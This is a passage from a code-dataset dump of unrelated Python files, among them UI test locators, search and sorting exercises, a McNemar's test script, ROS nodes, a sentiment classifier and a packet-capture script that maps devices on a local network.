\"//div[3]/input\",\n \"delete_icon\": \"//td[7]/a/img\",\n \"event_newEvent\": \"New Event\",\n \"event_saveButton\": \"//form/div[3]/input\",\n \"event_edit\": \"Edit\",\n # Access\n \"event_accessButton\": \"Access\",\n \"addAccess_button\": \"_save_add_access\",\n # Cancel Access Code\n \"event_select_accessCode\": \"//tr[4]/td/input\",\n \"event_CancelCode_button\": \"_save_cancel_access\",\n # Delete Access Code\n \"event_select_accessCode2\": \"//tr[3]/td/input\",\n \"event_DeleteCode_button\": \"//tr[3]/td[16]/a/img\",\n # Delete Event\n \"event_delete_button\": \"Delete\",\n # Search\n \"event_search\": \"//div[5]/input\",\n # Delete Event from table\n \"SPevent_list_delete\": \"//td[16]/a/img\",\n \"event_edit2Save\": \"save_event_top\",\n\n # Users / New User button\n \"tms_new_user_button\": \"New User\",\n \"tms_users_roles\": \"Roles\",\n # \"tms_new_user_edit\": \"Edit\",\n\n # Images / New Software Image\n \"tms_new_software_image\": \"New SoftwareImage\",\n \"image_save_button\": \"save_softwareimage_bottom\",\n \"image_edit_button\": \"Edit\",\n \"image_delete_button\": \"Delete\",\n\n # Deployments\n \"tms_new_deployment\": \"New Deployment\",\n \"tms_deployment_duplicate\": \"Duplicate\",\n \"deployment_save_button\": \"save_deployment_top\",\n \"deployment_edit_button\": \"Edit\",\n \"deployment_delete_button\": \"Delete\",\n \"deployment_new_channel_button\": \"New Channel\",\n \"deployment_save_new_channel\": \"saveDeploymentChannel_button_save\",\n\n #Deployment Plans\n \"tms_new_deployment_plan_button\": \"New Deployment Plan\",\n \"edit\": \"Edit\",\n \"new_deployment_button\": \"New Deployment\",\n \"save_deploymentplan__button\": 
\"save_deploymentplan_bottom\",\n \"PlannedDeployment_button_save\": \"savePlannedDeployment_button_save\",\n\n # Templates\n \"tms_new_template\": \"New Template\",\n \"tms_template_type_dropdown\": \"templateType\",\n \"tms_template_full_title\": \"saveTemplate_template_fullTitle\",\n \"tms_template_short_title\": \"saveTemplate_template_shortTitle\",\n \"tms_template_catalog_num\": \"saveTemplate_template_catalogNum\",\n \"tms_template_status_dropdown\": \"saveTemplate_template_releaseStatusKey\",\n \"tms_template_discription_link\": \"saveTemplate_template_externalLink\",\n \"tms_template_deployment_type_dropdown\": \"deployType\",\n \"tms_template_deployment_dropdown\": \"deploymentId\",\n \"tms_template_plan_dropdown0\": \"deploymentPlanId\",\n \"tms_template_note\": \"note\",\n \"tms_template_save_button\": \"saveTemplate_button_save\",\n \"tms_template_edit_button\": \"Edit\",\n \"tms_template_delete_button\": \"Delete\",\n\n # Voucher\n 'tms_voucher_newVoucher': \"New VoucherBlock\",\n 'tms_voucher_save_button': \"saveVoucherBlock_button_save\", # \"//div[2]/div/input\", # id: saveVoucherBlock_button_save\n 'tms_voucher_edit_button': \"//a[3]\",\n 'tms_voucher_delete_button': \"//a[4]\",\n\n # Platforms\n 'tms_platforms_newPlatform_button': \"//div[2]/div/a\",\n 'tms_platform_save_button': \"saveSystemPlatform_button_save\",\n 'tms_platform_edit_button': \"//div[2]/a\",\n 'tms_platform_delete_button': \"//a[2]\",\n }\n\n def ui_fields(self):\n return {\n # Basic Information\n \"tms_eventS_customer_drop_down\": \"customerId\", # Events/List/Events-Filters\n \"tms_event_customer_drop_down\": \"customerId\", # ReadyTech\n \"tms_event_billing_drop_down\": \"billingRegionId\", # -- All billing Entities --\n \"tms_event_eventType_drop_down\": \"eventTypeId\", # -- All Types --\n \"tms_event_choice_drop_down\": \"eventChoiceId\", # All Events\n \"tms_search_textbox\": \"searchName\",\n #\"tms_events_timezone_drop_down\": \"event.timezoneKey\",\n\n # Image\n \"tms_image_Lname\": \"saveSoftwareImage_image_longName\",\n \"tms_image_Sname\": \"saveSoftwareImage_image_shortName\",\n \"tms_image_Fname\": \"saveSoftwareImage_image_folderName\",\n \"images_AdminName\": \"saveSoftwareImage_image_adminUsername\",\n \"images_AdminPassword\": \"saveSoftwareImage_image_adminPassword\",\n \"images_StudentName\": \"saveSoftwareImage_image_studentUsername\",\n \"images_StudentPassword\": \"saveSoftwareImage_image_studentPassword\",\n \"images_InstructorName\": \"saveSoftwareImage_image_instructorUsername\",\n \"images_InstructorPassword\": \"saveSoftwareImage_image_instructorPassword\",\n \"image_size_gb\": \"saveSoftwareImage_image_sizeGb\",\n \"image_notes\": \"saveSoftwareImage_image_notes\",\n \"image_capture_note\": \"saveSoftwareImage_image_captureNote\",\n \"image_virtual_size_gb\": \"saveSoftwareImage_image_virtualSizeGb\",\n\n # Users / New User\n \"tms_new_user_username\": \"saveUser_username\",\n \"tms_new_user_password\": \"saveUser_user_password\",\n \"tms_new_user_password_confirm\": \"saveUser_user_confirmPassword\",\n \"tms_new_user_Fname\": \"saveUser_user_firstName\",\n \"tms_new_user_Lname\": \"saveUser_user_lastName\",\n \"tms_new_user_Pemail\": \"saveUser_primaryEmail\",\n \"tms_new_user_Alt_email\": \"saveUser_user_altEmail\",\n \"tms_new_user_roles\": \"moveAllRight1\",\n \"tms_new_user_save_button\": \"saveUser_button_save\",\n \"enabled\": \"user.accountEnabled\",\n\n # Resources (Self-Paced)\n \"tms_SPevent_Student_Fname\": \"saveEvent_event_studentFname\",\n 
\"tms_SPevent_Student_Lname\": \"saveEvent_event_studentLname\",\n \"tms_SPevent_Student_Email\": \"studentEmail\",\n\n\n \"event_owner\": \"ownerId\",\n \"event_name\": \"eventName\",\n \"event_startDate\": \"startDate\",\n \"event_endDate\": \"endDate\",\n \"event_timezone\": \"timezone\",\n \"event_confirmation_status\": \"saveEvent_event_confirmationStatusKey\",\n # Template Materials\n \"event_startingTemplate\": \"templateId\",\n \"event_provideAccess\": \"event.materialsAccess\",\n # Labs\n \"event_request_usears\": \"totalAccess\",\n \"event_deploymentType\": \"deployTypeKey\",\n \"event_deployment\": \"deploymentId\",\n \"event_assigned_DC\": \"datacenterId\",\n\n # Deployment\n \"deployment_name\": \"saveDeployment_deployment_name\",\n\n #Deployment Plans\n \"DeploymentPlan__name\": \"saveDeploymentPlan_deploymentPlan_name\",\n\n # Vouchers\n 'tms_voucher_size_of_block': \"blockSize\", # id\n 'tms_voucher_note': \"saveVoucherBlock_voucherBlock_billingAdjNote\", # id\n\n # Platforms\n 'tms_platforms_name': \"saveSystemPlatform_systemPlatform_name\",\n 'tms_platforms_memory': \"saveSystemPlatform_systemPlatform_memoryGb\",\n 'tms_platforms_disk': \"saveSystemPlatform_systemPlatform_diskGb\",\n 'tms_platforms_cpu_type': \"saveSystemPlatform_systemPlatform_cpuTypeKey\",\n 'tms_platforms_assignable_flag': \"systemPlatform.assignableFlag\",\n 'tms_platforms_fixed_schedule_flag': \"systemPlatform.fixedSchedFlag\",\n 'tms_platforms_auto_power_off': \"systemPlatform.autoPoweroff\",\n\n\n #\n\n\n }\n\n def estimation(self):\n return{\n # ilt_classroom for 3 users, 1 day\n \"ilt_estimation\": \"estimated_price\",\n }","sub_path":"TMS_PY/Local_scripts_TMS_PY/platforms/tms_elements.py","file_name":"tms_elements.py","file_ext":"py","file_size_in_byte":11651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"413309553","text":"def sequential_search(data, key) :\r\n found = False\r\n index = 0\r\n while ( not found and index < len(data) ):\r\n if ( key == data[index] ):\r\n found = True\r\n else:\r\n index = index + 1\r\n if ( not found):\r\n index = -1\r\n return index\r\n\r\n\r\ndef test():\r\n import time,random\r\n from binary_search import binary_search\r\n seq = []\r\n for i in range(1000):\r\n seq.append(i)\r\n \r\n a=random.randint(1,1000)\r\n c=time.time()\r\n sequential_search(seq,a)\r\n print(\"seq, %s\",time.time()-c)\r\n \r\n c=time.time()\r\n binary_search(seq,a)\r\n print(\"seq, %s\",time.time()-c)\r\n\r\n\r\ntest()\r\n\r\n","sub_path":"LAB8/sequential_search.py","file_name":"sequential_search.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"428625403","text":"'''\ncode for mcnemar's test\n\nSpecify the method name and dataset name in the command line argument.\nFor example, if you want to do mcnemar's test for the result of SEntiMoji and SEntiMoji-T\non Jira dataset, run:\npython Mtest.py -methodA=SEntiMoji -methodB=SEntiMoji-T -dataset=Jira\n'''\nimport argparse\nimport codecs\nfrom statsmodels.sandbox.stats.runs import mcnemar\n\n\ndef load_method_res(method, dataset):\n correct_set = set()\n incorrect_set = set()\n idx = 0\n\n for fold in range(0, 5):\n with codecs.open('../result/%s/fold%d/result_%s.txt' % (dataset, fold, method), 'r', 'utf-8') as f:\n for line in f:\n line = line.strip().split('\\t')\n # predict correct\n if line[1] == line[2]:\n correct_set.add(idx)\n\n # predict incorrect\n else:\n 
incorrect_set.add(idx)\n idx += 1\n\n res = {'method': method, 'dataset': dataset, 'length': idx,\n 'correct': correct_set, 'incorrect': incorrect_set}\n return res\n\n\ndef mcnemar_test(methodA_res, methodB_res):\n assert methodA_res['dataset'] == methodB_res['dataset']\n assert methodA_res['length'] == methodB_res['length']\n\n # calculate the contingency table for mcnemar's test\n #\t\t\t\t methodB\n # \t correct incorrect\n # methodA correct A B\n # incorrect C D\n\n A, B, C, D = 0, 0, 0, 0\n for idx in range(0, methodA_res['length']):\n if idx in methodA_res['correct'] and idx in methodB_res['correct']:\n A += 1\n if idx in methodA_res['correct'] and idx in methodB_res['incorrect']:\n B += 1\n if idx in methodA_res['incorrect'] and idx in methodB_res['correct']:\n C += 1\n if idx in methodA_res['incorrect'] and idx in methodB_res['incorrect']:\n D += 1\n table = [[A, B], [C, D]]\n\n test_result = mcnemar(table, exact=False, correction=True)\n return test_result\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-methodA', type=str, default='SEntiMoji', help='name of method A')\n parser.add_argument('-methodB', type=str, default='SEntiMoji-T', help='name of method B')\n parser.add_argument('-dataset', type=str, default='Jira', help='name of dataset')\n args = parser.parse_args()\n \n # parse argument\n methodA = args.methodA\n methodB = args.methodB\n dataset = args.dataset\n \n methodA_res = load_method_res(methodA, dataset)\n methodB_res = load_method_res(methodB, dataset)\n \n test_result = mcnemar_test(methodA_res, methodB_res)\n print(\"%s vs. %s dataset = %s\" % (methodA, methodB, dataset))\n print(\"mcnemar's test: statistic=%.3f, p-value=%.3f\" % (test_result[0], test_result[1]))\n","sub_path":"code/Mtest.py","file_name":"Mtest.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"65254241","text":"############################################################################## \n# BSD 3-Clause License\n# Copyright (c) 2021, Institut de Robotica i Informatica Industrial (CSIC-UPC)\n# All rights reserved. 
\n##############################################################################\n\nimport rospy\nimport dynamic_reconfigure.client\nfrom std_msgs.msg import Bool\n\n\nclass DisturbanceTriggerNode():\n def __init__(self, rate):\n rospy.init_node('disturbance_trigger')\n\n self.rate = rospy.Rate(rate)\n\n self.dynRecClient = dynamic_reconfigure.client.Client(\"/\" + rospy.get_namespace() + \"/mpc_controller\",\n config_callback=self.callbackStartController)\n\n self.disturbanceStart = rospy.get_param(rospy.get_namespace() + \"/disturbance_start\", 2.0)\n self.disturbanceDuration = rospy.get_param(rospy.get_namespace() + \"/disturbance_duration\", 2.0)\n\n self.timerDisturbanceTrigger = rospy.Timer(rospy.Duration(0.1), self.callbackDisturbanceTrigger)\n self.disturbanceTriggerPub = rospy.Publisher(\"/disturbance_enable\", Bool, queue_size=1)\n self.controllerStartTime = rospy.Time.now()\n\n def callbackStartController(self, config):\n self.controllerStarted = config.start_mission\n if self.controllerStarted:\n self.controllerStartTime = rospy.Time.now()\n\n def callbackDisturbanceTrigger(self, event):\n msg = Bool()\n msg.data = False\n if (rospy.Time.now() - self.controllerStartTime).to_sec() > self.disturbanceStart and (\n rospy.Time.now() - self.controllerStartTime\n ).to_sec() < self.disturbanceDuration + self.disturbanceStart and self.controllerStarted:\n msg.data = True\n\n self.disturbanceTriggerPub.publish(msg)\n\n\nif __name__ == '__main__':\n node = DisturbanceTriggerNode(10)\n\n try:\n while not rospy.is_shutdown():\n node.rate.sleep()\n\n except rospy.ROSInterruptException:\n pass\n","sub_path":"eagle_mpc_simulator/scripts/disturbance_trigger.py","file_name":"disturbance_trigger.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"200241076","text":"import os\nimport vtktools\nimport numpy as np\nimport matplotlib.pyplot as plt\npath='D:\\\\Desktop\\\\Dissertation\\\\von-karman\\\\circledata'\nf_list = os.listdir(path) # all files in path\nvtu_num = 0\nfor i in f_list:\n # os.path.splitext(os.listdir(path)[0]) will give filename and extension\n \tif os.path.splitext(i)[1] == '.vtu':\n \t\tvtu_num = vtu_num+1\nprint(vtu_num)\n \t\nfor n in range(vtu_num): # for everyfile \n\t\tfilename = path + \"/circle-2d-drag_\" + str(n)+ \".vtu\"# name of vtu files\n\t\tdata = vtktools.vtu(filename)\n\t\t\n\t\t\n\t\tuvw = data.GetVectorField('Velocity')\n\t\t\n\t\tui = np.hsplit(uvw,3)[0].T #velocity of x axis\n\t\tvi = np.hsplit(uvw,3)[1].T #velocity of y axis\n\t\twi = np.hsplit(uvw,3)[2].T #velocity of z axis\n\t\tveli = np.hstack((ui,vi,wi)) #combine all into 1-d array\n\t\tprint(n)\n\t\tvel = veli if n==0 else np.vstack((vel,veli))\nw = vel[:,int(vel.shape[1]/3)*2:]\noutputs = vel[:,:int(vel.shape[1]/3)*2] if np.all(w) == 0 else vel\nnp.save('Velocity(AE-64).npy',outputs)","sub_path":"4. 
dataset generation/circledata/res.py","file_name":"res.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"352882563","text":"# encoding: UTF-8\n#Blanca Flor Calderón Vázquez\n#Color mixer\n\n\ndef combinarColores(color1,color2):\n    if color1== \"azul\" or color1== \"rojo\" or color1== \"amarillo\":\n        if color2== \"azul\" or color2== \"rojo\" or color2== \"amarillo\":\n            if color1== \"azul\" and color2== \"azul\" :\n                color= \"azul\"\n            elif color2== \"rojo\" and color1== \"rojo\":\n                color =\"rojo\"\n            elif color1== \"amarillo\" and color2== \"amarillo\":\n                color =\"amarillo\"\n            elif color1== \"azul\" and color2== \"rojo\":\n                color =\"violeta\"\n            elif color1== \"azul\" and color2== \"amarillo\":\n                color =\"verde\"\n            elif color2== \"azul\" and color1== \"rojo\":\n                color=\"violeta\"\n            elif color2== \"azul\" and color1== \"amarillo\":\n                color=\"verde\"\n            elif color2== \"rojo\" and color1== \"amarillo\":\n                color=\"naranja\"\n            elif color1== \"rojo\" and color2== \"amarillo\":\n                color=\"naranja\"\n            \n        else:\n            color= \"error, ingresa bien tus datos\"\n    else:\n        color= \"error, ingresa bien tus datos\"\n        \n    return color\n    \n\n\ndef main():\n    \n    color1=input(\"ingresa el primer color que desees combinar(rojo, amarillo o azul)\")\n    color2=input(\"ingresa el segundo color que desees combinar(rojo, amarillo o azul)\")\n    colora1=color1.lower()\n    colora2=color2.lower()\n    colorResultante=combinarColores(colora1,colora2)\n    print (colorResultante)\n\nmain()\n","sub_path":"combinación de colores.py","file_name":"combinación de colores.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"341417187","text":"import pyshark\nfrom pyshark import *\nfrom pyshark.packet.packet import Packet\nimport sys\nfrom classFrames import NetworkLAN\nfrom DropBox_utils import DBlspDISC\n\n\n\n\nif len(sys.argv) < 4:\n    print(\"invalid usage\")\n    print(\"\\tUsage: python3 run_test.py <ego_output_path> <printer_file> <Folder_path> <filename_1> <filename_2> ... 
\")\n print(\"\\tNote that filenames are the name of files resided in Folder_path\")\n exit(1)\n\n\nego_path = sys.argv[1]\nprinter_file = sys.argv[2]\nfolder:str= sys.argv[3]\nfiles = sys.argv[4:]\n# folder :str='/root/captures/'\n\n# files:list=['cs_general_fixed.pcap']\n# files:list=['CNR_Big_capture.pcap']\n# files:list=['medium.pcap']\n#files:list=['cs_medium.pcap']\n# files:list=['for_debug.pcap']\n# files:list=['for_debug_cs.pcap']\n# printer_file = 'CS_printer_query_new'\n\n# folder :str='/root/captures/outdir/'\n# files:list=['CNR_chunk_00000_20190222172518.pcap',\n# 'CNR_chunk_00002_20190225101908.pcap',\n# 'CNR_chunk_00004_20190227235120.pcap',\n# 'CNR_chunk_00001_20190224014742.pcap',\n# 'CNR_chunk_00003_20190226175640.pcap',\n# 'CNR_chunk_00005_20190301070739.pcap',\n# ]\n# files :list = ['CNR_chunk_00005_20190301070739.pcap']\n\n\n\nnet=NetworkLAN()\n\n\n\nnet.active_probing()\n\n\nfor file in files:\n print('###################### ',file,' #######################')\n #First we have to allocate slots\n net.form_time_slots(folder+file)\n # collect mDNS infos\n cap:FileCapture=pyshark.FileCapture(\n input_file=folder+file,\n keep_packets=False,\n use_json=False\n )\n # cap.set_debug()\n\n for pkt in cap:\n\n # pkt_list.setdefault(file,[])\n #\n # pkt_list[file].append(pkt)\n\n if 'eth' in pkt:\n # collect mdns infos\n if 'mdns' in pkt:\n net.extract_mDNS_info(pkt)\n # collect Browser infos\n elif 'browser' in pkt:\n net.extract_Browser_info(pkt)\n # collect DHCP infos\n elif 'bootp' in pkt or 'dhcpv6' in pkt:\n net.extract_DHCP_info(pkt)\n #regardless of the protocol of\n\n cap.close()\n\n\n\n\nfor file in files:\n # collect Dropbox infos\n cap: FileCapture = pyshark.FileCapture(\n input_file=folder + file,\n keep_packets=False,\n use_json=True,\n display_filter=\"db-lsp-disc\"\n )\n\n for pkt in cap:\n net.extract_DB_infos_old(pkt)\n\n cap.close()\n\n # collect nbns and llmnr infos\n cap: FileCapture = pyshark.FileCapture(\n input_file=folder + file,\n keep_packets=False,\n # use_json=True,\n display_filter=\"llmnr or nbns or arp\"\n )\n\n for pkt in cap:\n if 'llmnr' in pkt:\n net.extract_llmnr_infos(pkt)\n elif 'nbns' in pkt:\n net.extract_nbns_infos(pkt)\n elif 'arp' in pkt:\n net.extract_ARP_Links(pkt)\n\n# show linked devices\nnet.extract_DB_links()\n\n# Online network probing\n\nnet.extract_offline_snmp_ip(printer_file)\n# net.extract_offline_snmp_mac()\n#calculating link weights\nnet.aggregate_links()\n\n#print snapshot of the network\nnet.printAll(file)\n# net.print_browser_inf()\n\nnet.ego_analysis(ego_path)\n#net.all_kind_protocol()\n#net.all_local_alias()\n\nprint('End')\n","sub_path":"src/run_test.py","file_name":"run_test.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"343775139","text":"import operator\nimport re;\nimport nltk;\nimport numpy as np;\nimport sys\n#np.set_printoptions(threshold=sys.maxsize)\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.linear_model import LogisticRegression\n\n\ndef regexpr(text):\n regexp=re.findall(r\"\\bnever\\b|\\bnot\\b|\\bno\\b|\\bcannot\\b|\\b[a-zA-Z]+n't\\b\",text)\n\n return regexp\n\nfeature_dict={}\n\n\ndef load_corpus(corpus_path):\n\n li=[]\n with open(corpus_path, 'r',encoding='latin-1') as infile:\n data = infile.readlines()\n for i in data:\n\n text = list(i.split(\"\\t\"))\n snippet=text[0]\n label=(int)(text[1])\n li.append((snippet,label))\n\n return li\n\nList=[]\nvocab=set()\ndef 
tokenize(snippet):\n\n snippet=re.sub(r\"(^|\\s)(')([^']+?)(')($|\\s)\", r\"\\1\\2 \\3 \\4 \\5\", snippet)\n snippet=snippet.split()\n tagged=tag_edits(snippet)\n List=(tag_negation(tagged))\n return List\n\ndef tag_edits(tokenized_snippet):\n start=end=0\n for i in range(len(tokenized_snippet)):\n if '[' in tokenized_snippet[i]:\n start=i\n if ']' in tokenized_snippet[i]:\n end=i\n break\n if start!=end:\n for i in range(start,end+1):\n if i==start:\n tokenized_snippet[i]=tokenized_snippet[i].replace(\"[\",\"\")\n elif i==end:\n tokenized_snippet[i] = tokenized_snippet[i].replace(\"]\", \"\")\n\n if tokenized_snippet[i]==\"\":\n tokenized_snippet.remove(\"\")\n tokenized_snippet[i]='EDIT_'+tokenized_snippet[i]\n return (tokenized_snippet)\n\n # while(1):\n # if ']' in tokenized_snippet[i]:\n # break;\n # tokenized_snippet[i]='EDIT_'+tokenized_snippet[i];\n # print(tokenized_snippet)\n\nstop_tag_words={\"but\",\"however\",\"nevertheless\",\".\",\"?\",\"!\"}\n\ndef tag_negation(tokenized_snippet):\n copy=tokenized_snippet[:]\n #print(copy)\n #print(tokenized_snippet)\n for i in range(len(tokenized_snippet)):\n if \"EDIT_\" in tokenized_snippet[i]:\n tokenized_snippet[i] = tokenized_snippet[i].replace(\"EDIT_\", \"\")\n\n wordpos=nltk.pos_tag(tokenized_snippet)\n\n\n List_wordpos=list(wordpos)\n\n\n for i in range(len(copy)):\n if \"EDIT_\" in copy[i]:\n li=list(List_wordpos[i])\n li[0]=\"EDIT_\"+li[0]\n List_wordpos[i] = tuple(li)\n\n\n #print(List_wordpos)\n b=False\n\n for i in range(len(List_wordpos)):\n # print(i)\n if regexpr(List_wordpos[i][0])!=[]:\n\n\n b=True\n if i+1<len(List_wordpos) :\n if List_wordpos[i+1][0]==\"only\":\n b=False\n continue\n if (List_wordpos[i][0] in stop_tag_words)|(List_wordpos[i][1] in['JJR','RBR']):\n # print()\n b=False\n if b==True:\n li = list(List_wordpos[i])\n li[0] = \"NOT_\" + li[0]\n List_wordpos[i] = tuple(li)\n\n\n return (List_wordpos)\n\n #nltk.pos_tag()\n\n\n\ndef get_features(preprocessed_snippet):\n v3=score_snippet(preprocessed_snippet,dal)\n feature_vector=np.zeros(len(feature_dict)+3)\n #print(feature_vector)\n for i in preprocessed_snippet:\n if \"EDIT_\" not in i[0]:\n if i[0] in feature_dict:\n\n num=feature_dict.get(i[0])\n feature_vector[num]=feature_vector[num]+1\n length=len(feature_vector)\n\n\n feature_vector[-3] = v3[0]\n feature_vector[-2] = v3[1]\n feature_vector[-1] = v3[2]\n\n return feature_vector\n\ndef normalize(X):\n shp=X.shape\n print(shp)\n #return X\n for i in range(shp[1]):\n\n max=X[np.argmax(X[:,i])][i]\n min=X[np.argmin(X[:,i ])][i]\n # print(max,\" \",min)\n #print(X[min][i])\n for j in range(shp[0]):\n f=X[j][i]\n if max==min:\n X[j][i]=f-min\n else:\n\n X[j][i]=(f-min)/(max-min)\n\n\n\n return X\n\n\ndef top_features(clf1,k):\n # a = []\n # c = []\n # print(clf1.coef_)\n List_wt = (clf1.coef_).tolist()[0]\n\n List_idx = []\n\n for i in range(len(List_wt)):\n List_idx.append(tuple((i,List_wt[i])))\n\n\n\n #print(List_idx)\n tup_wt_desc=sorted(List_idx, key=lambda x: abs(x[1]),reverse=True)\n\n # print(tup_wt_desc)\n #List_wt_desc=list(tup_wt_desc)\n List_wt_desc=[]\n\n for i in range(len(tup_wt_desc)):\n Li=[]\n for key,v in feature_dict.items():\n if v==tup_wt_desc[i][0]:\n Li.append(key)\n if len(Li)==0:\n if tup_wt_desc[i][0]==len(feature_dict):\n Li.append(\"activeness_dal\")\n if tup_wt_desc[i][0] == len(feature_dict) + 1:\n Li.append(\"evaluation_dal\")\n if tup_wt_desc[i][0] == len(feature_dict) + 2:\n Li.append(\"imager_dal\")\n Li.append(tup_wt_desc[i][1])\n List_wt_desc.append(tuple(Li))\n #print(k,\" 
\",type(k))\n r_list=[]\n for i in range(k):\n print(List_wt_desc[i])\n r_list.append(List_wt_desc[i])\n return r_list\n\n\n\n\ndef load_dal(dal_path):\n dal_dict={}\n with open(dal_path, 'r', encoding='latin-1') as infile:\n next(infile)\n\n data = infile.readlines()\n for i in data:\n text = list(i.split(\"\\t\"))\n\n dal_dict[text[0]]=tuple((float(text[1]),float(text[2]),(float)(text[3])))\n\n return dal_dict\n\n\ndef score_snippet(preprocessed_snippet, dal):\n #print(preprocessed_snippet)\n li_act=[]\n li_pl=[]\n li_img=[]\n for i in preprocessed_snippet:\n if \"EDIT_\" not in i[0]:\n if \"NOT_\" in i[0]:\n key = i[0].replace(\"NOT_\", \"\")\n if key in dal:\n val=dal[key]\n li_act.append(-1*val[0])\n li_pl.append(-1*val[1])\n li_img.append(-1*val[2])\n else:\n li_act.append(0)\n li_pl.append(0)\n li_img.append(0)\n\n else :\n key = i[0]\n if i[0] in dal:\n val=dal[key]\n li_act.append(val[0])\n li_pl.append(val[1])\n li_img.append(val[2])\n else:\n\n li_act.append(0)\n li_pl.append(0)\n li_img.append(0)\n\n\n\n # print(li_act)\n # print(li_pl)\n # print(li_img)\n return (sum(li_act)/len(li_act),sum(li_pl)/len(li_pl),sum(li_img)/len(li_img))\n\n\n\n\n\n\ndef evaluate_predictions(Y_pred, Y_true):\n tp=fp=fn=0\n for i in range(len(Y_true)):\n if ((Y_pred[i]) == 1) & ((Y_true[i] )== 1):\n tp=tp+1\n if ((Y_true[i])==0 )& ((Y_pred[i])==1):\n fp=fp+1\n if ((Y_true[i])==1) & ((Y_pred[i])==0):\n fn=fn+1\n print(tp,\" \",fp, \" \",fn)\n precision=(float)(tp/(tp+fp))\n recall = (float)(tp / (tp + fn))\n f_measure = (float)(2*precision*recall/(precision+recall))\n print(precision, \" \", recall, \" \", f_measure)\n return (precision,recall,f_measure)\n\n\ndal=load_dal(\"/Users/sravyakurra/Desktop/NLP/HW@2/dict_of_affect.txt\")\nLi=load_corpus(\"/Users/sravyakurra/Desktop/NLP/HW@2/train.txt\")\n#print(len(Li))\nfor i in Li:\n #print(i)\n\n List=tokenize(i[0])\n\n\n index=len(feature_dict)\n for i in List:\n if \"EDIT_\" not in i[0]:\n if i[0] not in feature_dict:\n feature_dict[i[0]] = index\n index = index + 1\n #length=len(feature_dict)\n\nX_train=np.empty(shape=(len(Li),len(feature_dict)+3))\nY_train=np.empty(shape=len(Li))\n\nfor i in range(len(Li)):\n #print(Li[i])\n List = tokenize(Li[i][0])\n# score_snippet(List,dal)\n X_train[i]=get_features(List)\n Y_train[i]=Li[i][1]\n# for i in range(len(Li)):\n# #print(Li[i])\n# print(X_train[i],\":\",Y_train[i])\n\nnormalized_X=(normalize(X_train))\nclf = GaussianNB()\nclf.fit(normalized_X, Y_train)\nclf_lr=LogisticRegression()\nclf_lr.fit(normalized_X, Y_train)\n\n\nLi_test=load_corpus(\"/Users/sravyakurra/Desktop/NLP/HW@2/test.txt\")\nX_test=np.empty(shape=(len(Li_test),len(feature_dict)+3))\nY_test=np.empty(shape=len(Li_test))\n\n\nfor i in range(len(Li_test)):\n #print(Li[i])\n List = tokenize(Li_test[i][0])\n\n X_test[i]=get_features(List)\n Y_test[i] = Li_test[i][1]\n#print(X_test)\n#print(\"hiii\")\n\nnormalized_Xtest = (normalize(X_test))\n\n#Y_pred=clf.predict(normalized_Xtest)\nY_pred_lr=clf_lr.predict(normalized_Xtest)\n#print(Y_pred)\n#print(Y_test)\n\n\nevaluate_predictions(Y_pred_lr,Y_test)\n\nprint(\"top featurtes:\",top_features(clf_lr,10))","sub_path":"Sentiment Analysis/Q4_Sentiment.py","file_name":"Q4_Sentiment.py","file_ext":"py","file_size_in_byte":8543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"59339667","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Time : 2018/1/25 23:38\r\n# @Author : Kevin Liu\r\n# @Site : \r\n# @File : cut.py\r\n# @Software: 
PyCharm\r\n\r\nimport jieba.analyse\r\nfrom visualization.dataAnalysis.mongoclient import client\r\n\r\n\r\ndef da_for_wordcloud():\r\n    datas = client.find_for_pyecharts({'keyword': 'python'}, ['detail'])\r\n    detail_string = ''.join(datas['detail'])\r\n    seg_list = jieba.analyse.extract_tags(detail_string, topK=20, withWeight=True, allowPOS=('eng', 'n'))\r\n    return list(zip(*seg_list))\r\n","sub_path":"visualization/dataAnalysis/cut.py","file_name":"cut.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"515567927","text":"#!/usr/bin/env python3\n\nimport rospy\nfrom std_msgs.msg import String\n\ndef simple_cb(val): #define the callback function named simple_cb\n    print(val)\n\ndef main():\n    rospy.init_node('subscriber_node') #initialize this node with the name subscriber_node\n    rospy.Subscriber('/talker', String, simple_cb) #create a subscriber that receives String values from the /talker topic and passes them to the simple_cb callback\n    rospy.spin() #keep the main function running in an endless loop\n\nif __name__ == '__main__':\n    main()","sub_path":"ros_simple_nodes/scripts/Subscriber.py","file_name":"Subscriber.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"604084957","text":"# TO-DO: Complete the selection_sort() function below \n\ndef selection_sort( arr ):\n    # loop through n-1 elements\n    for i in range(0, len(arr) - 1):\n        cur_index = i\n        smallest_index = cur_index\n        # TO-DO: find next smallest element (hint, can do in 3 loc - lines of code) \n        # First, I need to iterate through the elements that remain in the arr\n        for x in range(smallest_index + 1, len(arr)):\n            # Second, I need to check if the element is smaller than the currently smallest\n            if arr[x] < arr[smallest_index]:\n                # Third, if this statement is True, I will need to set the new index to be the smallest\n                smallest_index = x\n        # TO-DO: swap the arr\n        arr[cur_index], arr[smallest_index] = arr[smallest_index], arr[cur_index]\n\n    return arr\n\n\n# TO-DO: implement the Bubble Sort function below\n\ndef bubble_sort( arr ):\n    # Looping through each element in the array\n    for i in range(len(arr) - 1):\n        # Looping through the remaining elements\n        for x in range(len(arr) - 1 - i):\n            # comparing this 